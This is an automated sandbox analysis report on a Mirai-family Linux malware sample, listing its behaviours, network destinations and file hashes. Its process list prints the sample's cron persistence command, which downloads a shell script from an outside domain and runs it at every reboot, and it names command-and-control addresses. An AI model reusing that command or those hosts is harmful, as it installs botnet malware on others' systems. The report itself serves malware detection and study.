Analysis Overview
SHA256
3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
Threat Level: Known bad
The file 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf was found to be: Known bad.
Malicious Activity Summary
Mirai family
File and Directory Permissions Modification
Renames itself
Unexpected DNS network traffic destination
Creates/modifies Cron job
Changes its process name
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-28 02:24
Signatures
Mirai family
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-28 02:24
Reported
2024-10-28 02:27
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
130s
Max time network
136s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /tmp/3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
|---|---|---|---|
| Destination IP | 217.160.70.42 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /var/spool/cron/crontabs/tmp.HAq4X7 | /usr/bin/crontab | N/A |
Changes its process name
| Description | Indicator | Process | Target |
|---|---|---|---|
| Changes the process name, possibly in an attempt to hide itself | [kswapd0] | /tmp/3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf | N/A |
Processes
/tmp/3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf
[/tmp/3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| N/A | 224.0.0.251:5353 | N/A | udp |
| DE | 217.160.70.42:53 | kingstonwikkerink.dyn | udp |
| CZ | 195.133.92.51:18557 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.HAq4X7
| Hash | Value |
|---|---|
| MD5 | 3afbea3182e7ee7d34038d10c18b2ac4 |
| SHA1 | 1d2168cb7cd54872f95082bb778efe16868150e5 |
| SHA256 | 7f6dd9d0683c71dd02243f3500f06d58969859be09dac2e3d048b0300481033b |
| SHA512 | 8cc16b8c01cab818044dc49be83acf28fa7a0f5eda0b05fb87832478caccf35fd58f4b4b132b10045d9210e6287a2674f8b3002de5b78834e5f58f0922334b01 |